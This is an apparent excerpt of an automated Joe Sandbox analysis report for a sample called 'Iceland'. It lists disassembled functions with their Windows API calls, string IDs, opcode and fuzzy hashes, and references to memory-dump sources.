                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b1f47b4e4c94765a467c04644d16e3f3d6386384b2b46fafc03b7205fb845c5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E421BC32610219BBDF11CFA4CC42FEF3B69EF48768F110214FA156B0D2DAB5A891DB90
                                                                                                                                                                                                                                                                Function 00AB50F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00AB51A3
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00AB51B1
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00AB51B8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                • String ID: msctls_updown32
                                                                                                                                                                                                                                                                • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                • Opcode ID: 39e37c70b10e3c6b801319c20533f74864f6b665ee29bdae5d572613e9bea579
                                                                                                                                                                                                                                                                • Instruction ID: 3f6efc99a63a0a71bcc3ef5a79eb949a8827b92e74d298d407be00b376c0ff15
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39e37c70b10e3c6b801319c20533f74864f6b665ee29bdae5d572613e9bea579
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A2162B5600649AFDB10DF68DC81EBB37ADEB59364B040159F9049B362CB71EC52CBA0
                                                                                                                                                                                                                                                                Function 00AB4253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00AB42DC
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00AB42EC
                                                                                                                                                                                                                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00AB4312
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                • String ID: Listbox
                                                                                                                                                                                                                                                                • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                • Opcode ID: f62249ef4f31399be2a7c5e42018fad9530164958f98ee6bae69376f12a63aee
                                                                                                                                                                                                                                                                • Instruction ID: 46af485d631d36d102e35d8cae6e4012b0b1e5365e8de0fac7cd0ded4693ce7c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f62249ef4f31399be2a7c5e42018fad9530164958f98ee6bae69376f12a63aee
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31218032614118BBEF118F94DC85FFF3B6EEF89754F118124F9049B192CA719C529BA0
                                                                                                                                                                                                                                                                Function 00A95439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00A9544D
                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00A954A1
                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,00ABDCD0), ref: 00A95515
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                • String ID: %lu
                                                                                                                                                                                                                                                                • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                • Opcode ID: da67d82b19057ce483907c54b1fccdf3ea0f8e855d9cc95160eb0ab887fa2b15
                                                                                                                                                                                                                                                                • Instruction ID: 7f21b60b5cf466ca0d36726876a063c3189c69654867ff5306515d9618c8c0e5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da67d82b19057ce483907c54b1fccdf3ea0f8e855d9cc95160eb0ab887fa2b15
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A316570A00119AFDB11DF68D985EAA77F9EF05308F1440A5F409DB362D771EE45CB61
                                                                                                                                                                                                                                                                Function 00AB4C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00AB4CED
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00AB4D02
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00AB4D0F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                • Opcode ID: 87a826a16c7b618d4b5bf4f8d9f42b16616ec6bb6a3c453ea0ae0bbff53fc804
                                                                                                                                                                                                                                                                • Instruction ID: 12f7dee8bb9501390db8d0b355c3f5dff9d94798bbdd59c3c30402d159f709da
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87a826a16c7b618d4b5bf4f8d9f42b16616ec6bb6a3c453ea0ae0bbff53fc804
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9110671240248BEEF219F69CC06FEB3BACEF89B64F110514FA55E20A2D671DC61DB50
                                                                                                                                                                                                                                                                Function 00A8389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A28577: _wcslen.LIBCMT ref: 00A2858A
                                                                                                                                                                                                                                                                  • Part of subcall function 00A836F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A83712
                                                                                                                                                                                                                                                                  • Part of subcall function 00A836F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A83723
                                                                                                                                                                                                                                                                  • Part of subcall function 00A836F4: GetCurrentThreadId.KERNEL32 ref: 00A8372A
                                                                                                                                                                                                                                                                  • Part of subcall function 00A836F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00A83731
                                                                                                                                                                                                                                                                • GetFocus.USER32 ref: 00A838C4
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8373B: GetParent.USER32(00000000), ref: 00A83746
                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00A8390F
                                                                                                                                                                                                                                                                • EnumChildWindows.USER32(?,00A83987), ref: 00A83937
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                • String ID: %s%d
                                                                                                                                                                                                                                                                • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                • Opcode ID: 02cac565ec105bcfcf45ffe0f2f8377bc239e0ca15275481dd8b6434e3657758
                                                                                                                                                                                                                                                                • Instruction ID: c405c695cd89be6d745cc5bdd81e687b2e3c71bf00fa67304a29f429256b2e5d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02cac565ec105bcfcf45ffe0f2f8377bc239e0ca15275481dd8b6434e3657758
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9811DA726002056BCF11BF749E95AEE776AAF94704F044475FD09AB293EF749905CB30
                                                                                                                                                                                                                                                                Function 00AB6321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00AB6360
                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00AB638D
                                                                                                                                                                                                                                                                • DrawMenuBar.USER32(?), ref: 00AB639C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                • Opcode ID: 830650eab0ef78efbd37f09d745cc61600c9d4a5886a40a60c9c129ef166dcb8
                                                                                                                                                                                                                                                                • Instruction ID: 21bc02a292f9f917bcbcaf3ae37eb44ea84fec4dd3e947714ccaca7286ab9301
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 830650eab0ef78efbd37f09d745cc61600c9d4a5886a40a60c9c129ef166dcb8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3601C032500208AFDB209F64DC84FEEBBB8FF44314F108199E809DA152DB348A81EF30
                                                                                                                                                                                                                                                                Function 00A7E778 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00A7E797
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32 ref: 00A7E7BD
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                • API String ID: 3013587201-2590602151
                                                                                                                                                                                                                                                                • Opcode ID: 0efcfdd3cb0cb2c7e3f9f182a7677c0a7453cb8a169c68e31a2886bee2a717b4
                                                                                                                                                                                                                                                                • Instruction ID: 62fdf8318ec213ec6e31515d2e2c9f391bc5f797e10d3b4eb20f32fb97eff4ad
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0efcfdd3cb0cb2c7e3f9f182a7677c0a7453cb8a169c68e31a2886bee2a717b4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35E02B71902610DFD735D7645C54FAA32386F14700F14C7E4FC09F6051EB34CC458654
                                                                                                                                                                                                                                                                Function 00A8096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: d5168304d29c14b9f2ef9f742d62b222767dc7d542c34973266a88ee6a57e279
                                                                                                                                                                                                                                                                • Instruction ID: 769c3568e80ee94775083bfb614541f8b3342fd4f2b56e73c5bf80b4f35314a8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d5168304d29c14b9f2ef9f742d62b222767dc7d542c34973266a88ee6a57e279
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0FC18E75A0020AEFDB44DFA8C898EAEB7B5FF48704F108598E405EB251D731EE85CB90
                                                                                                                                                                                                                                                                Function 00A541F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                • Instruction ID: 506643302f8bce4261f18084baef6088d4073fa11978fbf949ae438f8df08018
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4DA166729407869FDB21CF18C8917AEBBF4FF19329F2441ADED959B291C23889C9C750
                                                                                                                                                                                                                                                                Function 00A80D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00AC0BD4,?), ref: 00A80EE0
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00AC0BD4,?), ref: 00A80EF8
                                                                                                                                                                                                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,00ABDCE0,000000FF,?,00000000,00000800,00000000,?,00AC0BD4,?), ref: 00A80F1D
                                                                                                                                                                                                                                                                • _memcmp.LIBVCRUNTIME ref: 00A80F3E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 314563124-0
                                                                                                                                                                                                                                                                • Opcode ID: 9eed28fff4a035600c9c26be950a2e89ee972454b1ab26ac22df2a7ea34f8126
                                                                                                                                                                                                                                                                • Instruction ID: df53ab92472d997ae2918fc15e085613798daa7367e4f538c8f23c1c29554ac5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9eed28fff4a035600c9c26be950a2e89ee972454b1ab26ac22df2a7ea34f8126
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72811871A00109EFCB44DFD8C984EEEB7B9FF89315F204558E506AB250DB71AE0ACB60
                                                                                                                                                                                                                                                                Function 00AAB0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00AAB10C
                                                                                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00AAB11A
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00AAB1FC
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AAB20B
                                                                                                                                                                                                                                                                  • Part of subcall function 00A3E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00A64D73,?), ref: 00A3E395
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                • Opcode ID: 187ceaa23b9089b07dbb41cffac6b5e0db82782e820bf1cff1bacaf4b773c838
                                                                                                                                                                                                                                                                • Instruction ID: a909849b10bcff7541c08c9ae9dbcd3095a9e148b1587b5e04d97f7636a6b2c1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 187ceaa23b9089b07dbb41cffac6b5e0db82782e820bf1cff1bacaf4b773c838
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59514D71508310AFD310EF28D986A5FBBE8FF89754F40492DF58597292EB30E905CBA2
                                                                                                                                                                                                                                                                Function 00A61711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                                                • Opcode ID: c60fc4b08aa6788499ecbfcb752c02d3c3c75bb98665d1b25b2a03c8cbbc8abf
                                                                                                                                                                                                                                                                • Instruction ID: 3aff470daed28f76c25753e6def296f026312bcbb8a8e846f9f76e20c6c9fef5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c60fc4b08aa6788499ecbfcb752c02d3c3c75bb98665d1b25b2a03c8cbbc8abf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65413835A00140AFDB21BFBD9D42ABE3EB4EF85730F2C0625F818D71A2EB35484597A1
